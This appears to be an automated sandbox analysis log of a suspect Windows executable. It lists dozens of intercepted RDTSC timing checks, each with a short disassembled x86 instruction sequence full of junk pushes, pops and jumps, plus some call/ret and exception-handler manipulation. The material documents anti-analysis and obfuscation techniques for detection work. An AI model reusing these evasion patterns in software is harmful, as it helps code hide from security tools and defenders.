            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 998762 second address: 998768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 998768 second address: 9987B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA07Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FA6C4EBA078h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 lea ebx, dword ptr [ebp+124634C9h] 0x0000002a jo 00007FA6C4EBA076h 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jnl 00007FA6C4EBA076h 0x0000003a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9988C0 second address: 99891F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD511h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push edi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FA6C4CAD50Ch 0x00000017 popad 0x00000018 pop edi 0x00000019 pop eax 0x0000001a mov cx, bx 0x0000001d mov edx, edi 0x0000001f push 00000003h 0x00000021 mov dword ptr [ebp+122D1B70h], ecx 0x00000027 push 00000000h 0x00000029 mov edx, dword ptr [ebp+122D3903h] 0x0000002f sub dword ptr [ebp+122D19B7h], edx 0x00000035 push 00000003h 0x00000037 mov dword ptr [ebp+122D3224h], ebx 0x0000003d push E498BDA0h 0x00000042 push eax 0x00000043 push edx 0x00000044 push esi 0x00000045 jne 00007FA6C4CAD506h 0x0000004b pop esi 0x0000004c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 99891F second address: 99894D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007FA6C4EBA076h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 2498BDA0h 0x00000013 adc ecx, 27D1736Ah 0x00000019 lea ebx, dword ptr [ebp+124634D2h] 0x0000001f mov di, si 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 jc 00007FA6C4EBA076h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 99894D second address: 998952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 998AFC second address: 998B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jmp 00007FA6C4EBA087h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 998B22 second address: 998B35 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ebx 0x0000000a pushad 0x0000000b ja 00007FA6C4CAD506h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 998B35 second address: 998B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b jmp 00007FA6C4EBA07Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA6C4EBA07Eh 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 99129A second address: 9912BD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA6C4CAD506h 0x00000008 ja 00007FA6C4CAD506h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FA6C4CAD513h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9912BD second address: 9912C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FA6C4EBA076h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9912C9 second address: 9912CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9B77AE second address: 9B77B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9B77B8 second address: 9B77BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9B77BE second address: 9B77D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA6C4EBA07Bh 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9B77D1 second address: 9B77E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4CAD514h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9B77E9 second address: 9B77FB instructions: 0x00000000 rdtsc 0x00000002 je 00007FA6C4EBA076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007FA6C4EBA094h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9B7D41 second address: 9B7D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9B7D45 second address: 9B7D54 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA6C4EBA076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9B81DD second address: 9B81E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9B81E1 second address: 9B81E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9B88E7 second address: 9B8908 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA6C4CAD506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FA6C4CAD512h 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9B8908 second address: 9B890E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9B890E second address: 9B8919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9B8919 second address: 9B892E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FA6C4EBA080h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9B892E second address: 9B8942 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA6C4CAD516h 0x00000008 jmp 00007FA6C4CAD50Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9B9012 second address: 9B903D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA07Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FA6C4EBA07Ah 0x00000013 jp 00007FA6C4EBA076h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9BF0A0 second address: 9BF0AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9BF0AF second address: 9BF0BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9BF0BA second address: 9BF0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9BF0C4 second address: 9BF0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 97EB5D second address: 97EB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4CAD50Ch 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c js 00007FA6C4CAD512h 0x00000012 jp 00007FA6C4CAD506h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 97EB7E second address: 97EB88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 97EB88 second address: 97EB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 97EB90 second address: 97EBA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jbe 00007FA6C4EBA076h 0x0000000c jmp 00007FA6C4EBA07Ch 0x00000011 pop edi 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9BFDF7 second address: 9BFE02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA6C4CAD506h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C52C0 second address: 9C52E0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FA6C4EBA08Ah 0x0000000c jmp 00007FA6C4EBA084h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C52E0 second address: 9C5307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA6C4CAD511h 0x00000008 jmp 00007FA6C4CAD511h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C5307 second address: 9C532C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA6C4EBA076h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FA6C4EBA07Fh 0x00000011 push edx 0x00000012 pop edx 0x00000013 jnl 00007FA6C4EBA076h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C549B second address: 9C549F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C549F second address: 9C54A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C54A3 second address: 9C54A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C54A9 second address: 9C54EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jnc 00007FA6C4EBA07Ch 0x00000012 popad 0x00000013 pushad 0x00000014 jne 00007FA6C4EBA08Eh 0x0000001a jmp 00007FA6C4EBA088h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FA6C4EBA07Ch 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C54EF second address: 9C54F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C5648 second address: 9C564E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C564E second address: 9C5666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4CAD514h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C597D second address: 9C59BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4EBA07Ch 0x00000009 jnc 00007FA6C4EBA076h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA6C4EBA07Bh 0x00000019 jmp 00007FA6C4EBA087h 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C5B4E second address: 9C5B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C5B54 second address: 9C5B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FA6C4EBA081h 0x0000000b popad 0x0000000c jo 00007FA6C4EBA07Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C7C9D second address: 9C7CCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD50Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 1E54D81Ch 0x00000010 or dword ptr [ebp+122D1979h], ecx 0x00000016 push B0D35803h 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e ja 00007FA6C4CAD506h 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C88BE second address: 9C88C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C8E75 second address: 9C8E7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C943F second address: 9C9445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C9445 second address: 9C9459 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jng 00007FA6C4CAD506h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C9459 second address: 9C945E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C9D53 second address: 9C9D5D instructions: 0x00000000 rdtsc 0x00000002 js 00007FA6C4CAD506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C9D5D second address: 9C9D85 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FA6C4EBA086h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jg 00007FA6C4EBA076h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9CAF3D second address: 9CAF47 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9CAF47 second address: 9CAF4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C9D85 second address: 9C9D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C9D8A second address: 9C9D9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA6C4EBA07Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9CAF4B second address: 9CAF82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a movzx edi, di 0x0000000d push 00000000h 0x0000000f or esi, 76D69985h 0x00000015 push 00000000h 0x00000017 jmp 00007FA6C4CAD519h 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f push esi 0x00000020 push edx 0x00000021 pop edx 0x00000022 pop esi 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9CBA7D second address: 9CBAC7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA6C4EBA07Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d pushad 0x0000000e mov bh, B4h 0x00000010 xor bx, BD54h 0x00000015 popad 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+124652BFh], ebx 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+122D1B6Ch], esi 0x00000026 xchg eax, ebx 0x00000027 jg 00007FA6C4EBA07Eh 0x0000002d push eax 0x0000002e push ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FA6C4EBA07Bh 0x00000036 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9CBAC7 second address: 9CBACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9CDBB2 second address: 9CDC15 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FA6C4EBA078h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 call 00007FA6C4EBA085h 0x00000027 pop esi 0x00000028 push 00000000h 0x0000002a mov di, bx 0x0000002d push 00000000h 0x0000002f jmp 00007FA6C4EBA07Dh 0x00000034 xchg eax, ebx 0x00000035 push ebx 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 pop edx 0x0000003a pop ebx 0x0000003b push eax 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D0675 second address: 9D0681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push esi 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9CE42B second address: 9CE42F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D0852 second address: 9D0858 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9CE42F second address: 9CE435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D0858 second address: 9D08F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD50Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA6C4CAD516h 0x00000010 pop edx 0x00000011 nop 0x00000012 movzx edi, si 0x00000015 push dword ptr fs:[00000000h] 0x0000001c or bx, F040h 0x00000021 mov dword ptr [ebp+122D24DEh], ecx 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007FA6C4CAD508h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 mov ebx, ecx 0x0000004a mov eax, dword ptr [ebp+122D1071h] 0x00000050 jp 00007FA6C4CAD521h 0x00000056 push FFFFFFFFh 0x00000058 mov bx, 9E5Ah 0x0000005c nop 0x0000005d push ebx 0x0000005e pushad 0x0000005f push edi 0x00000060 pop edi 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9CE435 second address: 9CE45A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA6C4EBA08Bh 0x00000008 jmp 00007FA6C4EBA085h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D18C3 second address: 9D18D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jg 00007FA6C4CAD50Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9CE45A second address: 9CE468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FA6C4EBA076h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D18D0 second address: 9D18EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA6C4CAD513h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D2829 second address: 9D28D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA085h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a nop 0x0000000b xor dword ptr [ebp+122D3596h], edx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 jmp 00007FA6C4EBA080h 0x0000001d add dword ptr [ebp+12486736h], esi 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007FA6C4EBA078h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 0000001Ch 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 mov eax, dword ptr [ebp+122D0289h] 0x0000004a xor bh, FFFFFFD5h 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007FA6C4EBA078h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 00000019h 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 nop 0x0000006a push ecx 0x0000006b ja 00007FA6C4EBA07Ch 0x00000071 pop ecx 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 jnl 00007FA6C4EBA078h 0x0000007b rdtsc
